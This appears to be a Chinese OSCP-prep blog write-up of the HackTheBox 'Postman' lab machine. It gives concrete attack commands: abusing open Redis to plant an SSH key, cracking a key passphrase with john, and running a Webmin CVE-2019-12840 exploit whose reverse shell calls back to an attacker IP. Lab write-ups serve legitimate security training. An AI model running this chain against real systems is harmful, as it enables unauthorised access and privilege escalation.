OSCP备考_0x22_HackThBox靶机_Linux_postman

Ethan医生1天前靶场6

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.20.206 (扫描UDP)


image.png


http://10.129.20.206/#first-section


image.png



https://10.129.20.206:10000/

image.png

没有可直接地用的地方那就试试看直接登入6379,

redis-cli -h 10.129.20.206

image.png

通过上面图片我们发现我们具有写入的权限


先在本地的kali上创建密钥

ssh-keygen

image.png



使用之前的私钥进行连接

ssh -i yes redis@10.129.20.206

直接拿到SHELL

image.png


手动枚举并没有什么有用的信息

所以上传linpeas进行枚举

image.png

image.png

有个密钥可以使用ssh2john进行转换 里面有具体操作过程,可以获取到一个密码computer2008

ssh2john id_rsa > hash_key

john hash_key --wordlist=/usr/share/wordlists/rockyou.txt

image.png

computer2008

image.png

search cve-2019-12840

use 0

set RHOSTS 10.10.10.160

set PASSWORD computer2008

set USERNAME Matt

set SSL True

run

提权到ROOT权限

使用10000端口上的webmin

python 50809.py -t https://10.129.20.206:10000 -c Matt:computer2008 -LS 10.10.16.31:8001 -L 10.10.16.31 -P 3333

image.png

标签: OSCP

相关文章

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。